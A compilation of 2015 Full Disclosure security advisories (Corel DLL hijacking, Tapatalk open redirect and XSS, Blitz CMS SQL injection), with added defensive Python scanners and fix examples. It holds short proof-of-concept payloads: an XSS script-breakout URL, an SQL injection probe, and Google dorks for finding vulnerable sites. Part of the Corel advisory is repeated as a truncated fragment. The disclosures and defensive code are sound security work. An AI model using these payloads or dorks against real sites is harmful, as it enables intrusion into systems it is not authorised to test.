   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should avoid opening untrusted files whose extensions are associated with Corel software and contain any of the DLL files detailed below.


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto from Core Security Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.


7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file associated with any of the following Corel applications is executed (CorelDRAW X7, Corel Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF Fusion). The affected application should not be running for the vulnerability to work. The Corel software looks for a DLL file called "wintab32.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file associated with Corel CAD 2014 is executed. Corel CAD 2014 should not be running before the associated file is executed for the vulnerability to work. Corel CAD looks for a DLL file called "FxManagedCommands_3.08_9.tx" or "TD_Mgd_3.08_9.dll" and does not control their path, therefore allowing an attacker to copy a malicious DLL file with the same name as either DLL inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a file associated with Corel Painter 2015 is executed. Corel Painter 2015 should not be running before the associated file is executed for the vulnerability to work. Corel Painter looks for a DLL file called "wacommt.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a file associated with Corel PDF Fusion is executed. Corel PDF Fusion should not be running before the associated file is executed for the vulnerability to work. Corel PDF Fusion looks for a DLL file called "quserex.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a file associated with Corel VideoStudio PRO X7 or Corel FastFlick is executed. Corel Video Studio or Corel FastFlick should not be running before the associated file is executed for the vulnerability to work. Corel PDF Fusion looks for a DLL file called "u32ZLib.dll" and does not control its path, therefore allowing an attacker to copy a malicious DLL file with the same name inside the folder where the associated file is. The DLL is executed within the context of the application.

[CVE-2014-8398] This vulnerability is caused by a DLL Hijacking when a file associated with Corel FastFlick is executed. Corel FastFlick should not be running before the associated file is executed for the vulnerability to work. Corel FastFlic

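A detection sweep for the DLL names this advisory lists, as an added example (not Core Security's or Corel's code): it walks a folder tree case-insensitively, as NTFS resolves names, and reports each hijackable file name with the CVE the advisory's section 7 assigns to it; the sample tree, its document names and the temporary directory are constructed.

```python
"""Finding planted DLLs beside documents (Corel DLL hijacking, CORE-2015-0001).

Added example, not Core Security's or Corel's code.  The advisory says the
document's directory is searched first for the DLL names below, so a sweep of
user-writable folders for those names is a cheap detection.  The name-to-CVE
mapping follows section 7 of the advisory; the sample tree is constructed.
"""
import os
import tempfile
from typing import Dict, List, Tuple

# Lower-cased because Windows file names are case-insensitive.
HIJACKABLE: Dict[str, str] = {
    "wintab32.dll": "CVE-2014-8393",
    "fxmanagedcommands_3.08_9.tx": "CVE-2014-8394",
    "td_mgd_3.08_9.dll": "CVE-2014-8394",
    "wacommt.dll": "CVE-2014-8395",
    "quserex.dll": "CVE-2014-8396",
    "u32zlib.dll": "CVE-2014-8397",
}


def scan(root: str) -> List[Tuple[str, str, int]]:
    """Walk root and return (relative_path, cve, other_files) per hijackable name.

    other_files counts the non-hijackable files in the same folder: a planted
    DLL only matters when a document is there for the victim to open, so a
    lone DLL in an empty folder ranks lower in triage.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        by_lower = {f.lower(): f for f in files}
        for lowered, cve in HIJACKABLE.items():
            if lowered not in by_lower:
                continue
            others = sum(1 for g in files if g.lower() not in HIJACKABLE)
            rel = os.path.relpath(os.path.join(dirpath, by_lower[lowered]), root)
            hits.append((rel.replace(os.sep, "/"), cve, others))
    return sorted(hits)


def make_sample_tree() -> str:
    """Constructed sample: a Downloads folder holding documents and two planted DLLs."""
    root = tempfile.mkdtemp(prefix="corel-scan-")
    layout = {
        "Downloads/brochure.cdr": b"",                 # constructed document name
        "Downloads/WinTab32.dll": b"MZ",               # planted, mixed case on purpose
        "Downloads/invoice/plan.dwg": b"",             # constructed document name
        "Downloads/invoice/TD_Mgd_3.08_9.dll": b"MZ",  # planted
        "Pictures/holiday.jpg": b"",
    }
    for rel, data in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, cve, others in scan(make_sample_tree()):
        print(f"{rel}: {cve} ({others} other file(s) alongside)")
```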
[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics, painting, photo, video and office software (CorelDRAW, Corel Photo-Paint, Corel PaintShop Pro, Corel CAD, Corel Painter, Corel PDF Fusion, Corel VideoStudio and Corel FastFlick, among others).



When a file associated with the Corel software is opened, the directory of that document is first used to locate DLLs, which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document.



4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should avoid opening untrusted files whose extensions are associated with Corel software when the folder holding them also contains any of the DLL files detailed below.


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto from Core Security Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.



7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by DLL hijacking when a file associated with any of the following Corel applications is opened: CorelDRAW X7, Corel Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF Fusion. The affected application should not be running for the vulnerability to work. The Corel software looks for a DLL file called "wintab32.dll" and does not control its path, so a malicious DLL file with the same name can be placed in the folder containing the associated file. The DLL is executed within the context of the application.


[CVE-2014-8394] This vulnerability is caused by DLL hijacking when a file associated with Corel CAD 2014 is opened. Corel CAD 2014 should not be running before the associated file is opened for the vulnerability to work. Corel CAD looks for a DLL file called "FxManagedCommands_3.08_9.tx" or "TD_Mgd_3.08_9.dll" and does not control their path, so a malicious DLL file with either name can be placed in the folder containing the associated file. The DLL is executed within the context of the application.


[CVE-2014-8395] This vulnerability is caused by DLL hijacking when a file associated with Corel Painter 2015 is opened. Corel Painter 2015 should not be running before the associated file is opened for the vulnerability to work. Corel Painter looks for a DLL file called "wacommt.dll" and does not control its path, so a malicious DLL file with the same name can be placed in the folder containing the associated file. The DLL is executed within the context of the application.


[CVE-2014-8396] This vulnerability is caused by DLL hijacking when a file associated with Corel PDF Fusion is opened. Corel PDF Fusion should not be running before the associated file is opened for the vulnerability to work. Corel PDF Fusion looks for a DLL file called "quserex.dll" and does not control its path, so a malicious DLL file with the same name can be placed in the folder containing the associated file. The DLL is executed within the context of the application.


[CVE-2014-8397] This vulnerability is caused by DLL hijacking when a file associated with Corel VideoStudio PRO X7 or Corel FastFlick is opened. Corel VideoStudio or Corel FastFlick should not be running before the associated file is opened for the vulnerability to work. Corel PDF Fusion looks for a DLL file called "u32ZLib.dll" and does not control its path, so a malicious DLL file with the same name can be placed in the folder containing the associated file. The DLL is executed within the context of the application.


[CVE-2014-8398] This vulnerability is caused by DLL hijacking when a file associated with Corel FastFlick is opened. Corel FastFlick should not be running before the associated file
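The following Python script is an added example (not code from Core Security or Corel) of the defensive check a reviewer would want alongside section 7: it walks a directory tree and flags any file whose name matches one of the DLL names listed in the advisory and that sits outside the Windows and Program Files directories, i.e. in a document folder where a planted copy would be picked up by the search order described in section 3. The trusted-directory prefixes, the constructed sample tree and the document file names in it are assumptions for the demonstration.

```python
"""Scan a directory tree for the DLL names from CORE-2015-0001 sitting in
user-writable document folders (CWE-427 indicator).  Added example; the
trusted prefixes and sample layout are assumptions, not advisory content."""
import hashlib
import os
import tempfile

# Names taken from section 7 of the advisory.  Compared case-insensitively,
# because Windows file-name lookups are case-insensitive.
HIJACKABLE_NAMES = {
    "wintab32.dll": "CVE-2014-8393",
    "fxmanagedcommands_3.08_9.tx": "CVE-2014-8394",
    "td_mgd_3.08_9.dll": "CVE-2014-8394",
    "wacommt.dll": "CVE-2014-8395",
    "quserex.dll": "CVE-2014-8396",
    "u32zlib.dll": "CVE-2014-8397",
}

# Assumed: top-level folders (relative to the scanned root, e.g. C:\) where
# these names may legitimately live.  A copy anywhere else is suspicious.
TRUSTED_PREFIXES = ("windows", "program files", "program files (x86)")


def _is_trusted(rel_dir):
    first = rel_dir.replace("\\", "/").split("/")[0].lower()
    return first in TRUSTED_PREFIXES


def sha256_of(path):
    """Hex SHA-256 of a file, streamed so large files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root):
    """Return sorted (relative_path, cve, sha256) triples for every matching
    file found outside the trusted prefixes under `root`."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if rel_dir == ".":
            rel_dir = ""
        if _is_trusted(rel_dir):
            continue
        for name in files:
            cve = HIJACKABLE_NAMES.get(name.lower())
            if cve:
                full = os.path.join(dirpath, name)
                findings.append((os.path.join(rel_dir, name), cve, sha256_of(full)))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample layout (not a real host): a legitimate system copy,
    two planted DLLs next to downloaded documents, and an untouched folder."""
    root = tempfile.mkdtemp(prefix="corel-scan-")
    layout = {
        "Windows/System32/quserex.dll": b"legitimate system copy",
        "Users/alice/Downloads/invoice.cdr": b"document",      # extension assumed
        "Users/alice/Downloads/WINTAB32.DLL": b"planted copy",
        "Users/alice/Downloads/u32ZLib.dll": b"planted copy 2",
        "Users/bob/plan.dwg": b"document",                     # extension assumed
    }
    for rel, data in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    for rel, cve, digest in scan(build_sample_tree()):
        print(f"{cve}: {rel} sha256={digest}")
```

Run against a real volume, each hit is a candidate for quarantine and hash lookup; a DLL with one of these names next to user documents has no legitimate reason to be there, since the applications ship their own copies under their installation directories.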

[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to
version 1.1.2 allowed attackers to redirect users to arbitrary URLs. This was
possible by specifying the target URL in the URL parameter board_url, in URLs
like the following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.

-- 
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer:                        Patrick Hof, Jens Liebchen



___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
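As an added example, not the plugin's own code, the following Python shows the allow-list check that closes a redirect like the board_url one above: the target is accepted only if it is an absolute http(s) URL whose host is one of the forum's own, and anything else (an off-site host, a scheme-relative "//host" form, backslash variants, or user@host confusion) falls back to a fixed landing page. The allowed hosts and the fallback URL are assumptions for the demonstration.

```python
"""Allow-list validation for a user-supplied redirect target such as the
board_url parameter of welcome.php.  Added example; the allowed hosts and
the fallback URL are assumptions, not values from the plugin."""
from urllib.parse import parse_qs, urlsplit, urlunsplit

ALLOWED_HOSTS = {"www.example.com", "example.com"}   # assumed: the forum's own hosts
FALLBACK = "https://www.example.com/"                 # assumed: safe landing page


def safe_board_url(candidate, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return `candidate` only if it is an absolute http(s) URL on an allowed
    host; otherwise return `fallback`, so the browser is never sent off-site."""
    if not isinstance(candidate, str) or not candidate.strip():
        return fallback
    # Browsers treat backslashes like forward slashes, so "https:/\evil" would
    # reach an attacker's host; normalise before parsing.
    try:
        parts = urlsplit(candidate.strip().replace("\\", "/"))
    except ValueError:
        return fallback                      # malformed netloc (e.g. stray brackets)
    if parts.scheme.lower() not in ("http", "https"):
        return fallback                      # also rejects scheme-relative "//host"
    if parts.username is not None or parts.password is not None:
        return fallback                      # "https://good.example@evil.example" trick
    host = parts.hostname
    if host is None or host.lower() not in allowed_hosts:
        return fallback
    return urlunsplit(parts)


def welcome_redirect(query_string):
    """Constructed stand-in for the script's entry point: read board_url from
    the query string and return the value a Location header should carry."""
    values = parse_qs(query_string).get("board_url", [])
    return safe_board_url(values[0] if values else None)


if __name__ == "__main__":
    # The query string from the advisory's example URL
    print(welcome_redirect("board_url=https://www.redteam-pentesting.de"))
    print(welcome_redirect("board_url=https://www.example.com/forum/"))
```

Matching on the parsed host name rather than on a string prefix is the point: prefix checks such as `startswith("https://www.example.com")` are defeated by `https://www.example.com.evil.example` or by userinfo forms, while the parsed host either is or is not in the set.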

[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning
  Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via URL
parameters.


Details
===

Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: >= 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869


Introduction
============

"Tapatalk is an app built for interacting with discussion forums on
mobile devices. It differs from a forum’s mobile web skin in that it
offers the speed of a native app and a streamlined unified interface for
every forum a user subscribes to. Tapatalk also creates a unique
eco-system that allows forums to be searched and discovered by millions
of Tapatalk users which in turn promotes content, new memberships, and
interactions."

(from Tapatalk's Homepage)


More Details
============

The Tapatalk extension includes the PHP script welcome.php at the path

com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php

which is accessible via the URL

http://www.example.com/mobiquo/smartbanner/welcome.php

on systems using the plugin. It outputs JavaScript code that includes
improperly encoded values from the two URL parameters "app_android_id"
and "app_kindle_url". Depending on which parameter is used, one of
their values is assigned to the PHP variable $byo:


[...]

$.getJSON("",function(data){
[...]



Proof of Concept
================

The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php
  ?app_kindle_url=");alert('RedTeam Pentesting');
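To make the encoding failure concrete, the following added example (Python reproducing the PHP interpolation pattern, not the plugin's code) renders the `$.getJSON("...")` call twice, once by splicing the raw parameter into the script as welcome.php does and once through a proper JavaScript string-literal encoder, and then uses a small literal parser to show where the string actually ends in each case. The PoC value is the advisory's own, URL-decoded; the template text around it is an assumption.

```python
"""Vulnerable versus fixed rendering of a JS string literal built from a URL
parameter, with a minimal JS string-literal parser to show where the literal
really ends.  Added example; the surrounding script text is assumed."""
import json

# The advisory's PoC value for app_kindle_url, URL-decoded
PAYLOAD = "\");alert('RedTeam Pentesting');"


def render_vulnerable(app_kindle_url):
    # Same pattern as the plugin: the raw value is dropped into a JS string
    # literal, so a double quote in it terminates the literal early.
    return '$.getJSON("' + app_kindle_url + '", function(data){ /* ... */ });'


def js_string_literal(value):
    """Encode `value` as a JavaScript string literal safe inside <script>.
    json.dumps escapes quotes, backslashes, control characters and, with
    ensure_ascii, U+2028/U+2029; <, > and & are escaped on top so that
    "</script>" inside the value cannot close the enclosing script element.
    PHP equivalent: json_encode($v, JSON_HEX_TAG | JSON_HEX_AMP)."""
    encoded = json.dumps(value, ensure_ascii=True)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_fixed(app_kindle_url):
    return "$.getJSON(" + js_string_literal(app_kindle_url) + ", function(data){ /* ... */ });"


_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f"}


def parse_leading_literal(rendered):
    """Decode the first double-quoted JS string literal in `rendered` and
    return (decoded_value, text_after_literal).  Implements just enough of
    the JS grammar (backslash escapes and \\uXXXX) to show whether the user
    value stayed inside the literal."""
    i = rendered.index('"') + 1
    out = []
    while i < len(rendered):
        c = rendered[i]
        if c == '"':
            return "".join(out), rendered[i + 1:]
        if c == "\\":
            nxt = rendered[i + 1]
            if nxt == "u":
                out.append(chr(int(rendered[i + 2:i + 6], 16)))
                i += 6
            else:
                out.append(_SIMPLE_ESCAPES.get(nxt, nxt))
                i += 2
            continue
        out.append(c)
        i += 1
    raise ValueError("unterminated string literal")


def value_survives_intact(rendered, original):
    """True when the rendered script keeps `original` as one literal followed
    by the expected continuation of the getJSON call."""
    value, rest = parse_leading_literal(rendered)
    return value == original and rest.startswith(", function")


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(parse_leading_literal(render_vulnerable(PAYLOAD)))   # ('', ');alert(...')
    print(render_fixed(PAYLOAD))
    print(parse_leading_literal(render_fixed(PAYLOAD)))        # (PAYLOAD, ', function...')
```

Encoding is the minimum fix for this sink; since app_kindle_url is meant to be a URL, validating it against the expected store-URL shape before it reaches the script is the additional check a reviewer would ask for.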

[FD] Blitz CMS Community - SQL Injection Web Vulnerability

2015-01-12 Thread Vulnerability Lab
Document Title:
===
Blitz CMS Community - SQL Injection Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1403


Release Date:
=============
2015-01-12


Vulnerability Laboratory ID (VL-ID):
====================================
1402


Common Vulnerability Scoring System:
====================================
8.3


Product & Service Introduction:
===
http://www.blitzbasic.com/Products/_index_.php


Abstract Advisory Information:
==
An independent Vulnerability Laboratory researcher discovered a remote SQL injection web vulnerability in the official BlitzBasic Blitz CMS.


Vulnerability Disclosure Timeline:
==
2015-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
BlitzBasic
Product: Blitz CMS - Web Application (Community) 2015 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:
================================
A SQL injection web vulnerability has been discovered in the official BlitzBasic Blitz Content Management System (CMS).
The vulnerability allows an attacker to inject SQL commands through a vulnerable parameter value and thereby compromise the application's DBMS.

The SQL injection vulnerability is located in the `id` value handled by the vulnerable `view_pic.php` application file. Remote attackers are able to inject their own SQL commands through the vulnerable `id` value of the `view_pic.php` file. A successful attack requires manipulating the `id` value of a GET request to inject the SQL commands. The injection is a basic ORDER BY SQL injection that allows compromising the web application and the connected DBMS. The attack vector of the issue is located on the application side, and the request method used to inject the SQL commands is GET.

The security risk of the SQL injection vulnerability is estimated as high, with a CVSS (Common Vulnerability Scoring System) score of 8.3.
Exploitation of the application-side web vulnerability requires no privileged web application user account and no user interaction.
Successful exploitation of the security vulnerability results in compromise of the web application and the database management system.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Community

Vulnerable File(s):
[+] view_pic.php

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
===
The remote SQL injection web vulnerability can be exploited by remote attackers without a privileged application user account or user interaction.
For a security demonstration, or to reproduce the security vulnerability, follow the information and steps provided below.

Google Dork:
inurl:".php?view_pic="
inurl:"Community/posts.php?topic="

PoC:
http://[localhost]/gallery/view_pic.php?id=-1'[SQL INJECTION VULNERABILITY]--

Reference(s):
http://[localhost]/Community/posts.php?topic=43068%27


Solution - Fix & Patch:
===
The vulnerability can be patched by securely parsing and encoding the `id` value in the view_pic.php file.
Use a prepared statement to fix the issue fully, and set up your own exception handling that prevents SQL injection attacks.


Security Risk:
==
The security risk of the remote SQL injection web vulnerability in the community post file is estimated as critical. (CVSS 8.3)


Credits & Authors:
==
IranGuard Security Team - P0!s0nC0d3


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com- ad...@evolution-sec.com
Section:magazine.vulnerability-db.com   - 
vulnerability-lab.com/contact.php - 
evolution-
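The "Solution - Fix & Patch" section above says to validate the `id` value and use a prepared statement; the following added example (Python with sqlite3 standing in for the CMS's PHP and MySQL code, with a constructed table) puts the vulnerable string-building pattern beside the fixed one and shows what each does with the `-1'` probe from the PoC: the spliced query fails with a SQL syntax error, which is the error-based signal an attacker looks for, while the fixed version rejects the value before any SQL is built and, for well-formed values, binds the integer as a parameter so the database never parses it as SQL.

```python
"""Vulnerable string-built query versus validation plus a parameterised
statement for an integer `id` GET parameter like the one view_pic.php reads.
Added example in Python/sqlite3; the table and its contents are constructed."""
import sqlite3


def make_db():
    """Constructed sample table (assumed shape; the real schema is not given)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pics (id INTEGER PRIMARY KEY, title TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO pics VALUES (?, ?, ?)",
        [(1, "sunset", "alice"), (2, "harbour", "bob"), (3, "private", "carol")],
    )
    return conn


def view_pic_vulnerable(conn, raw_id):
    # The flaw: the GET parameter is spliced into the SQL text, so a quote in
    # it changes the statement itself.  The -1' probe produces a syntax error.
    sql = "SELECT id, title FROM pics WHERE id = '" + raw_id + "'"
    return conn.execute(sql).fetchall()


def view_pic_fixed(conn, raw_id):
    """Validate the type first, then bind the value as a parameter.  The DBMS
    receives statement and value separately, so the value is data, never SQL.
    PHP equivalent: mysqli/PDO prepare(), bind the integer, execute()."""
    try:
        pic_id = int(raw_id)
    except (TypeError, ValueError):
        return None                     # caller should answer 400 Bad Request
    return conn.execute("SELECT id, title FROM pics WHERE id = ?", (pic_id,)).fetchall()


def demo(raw_id):
    """Run both versions on one input; return (vulnerable_result, fixed_result).
    A SQL error from the vulnerable path is returned as a string so the caller
    can see the difference in behaviour."""
    conn = make_db()
    try:
        vulnerable = view_pic_vulnerable(conn, raw_id)
    except sqlite3.OperationalError as exc:
        vulnerable = "SQL error: " + str(exc)
    return vulnerable, view_pic_fixed(conn, raw_id)


if __name__ == "__main__":
    for probe in ("2", "-1'"):          # a normal id and the advisory's PoC probe
        print(repr(probe), "->", demo(probe))
```

Returning `None` for a non-integer id and answering with a 400 is the "own exception handling" the advisory asks for: the request is refused before the database is involved, and the detail of the database error is never reflected to the client, which removes both the injection and the error-based feedback channel.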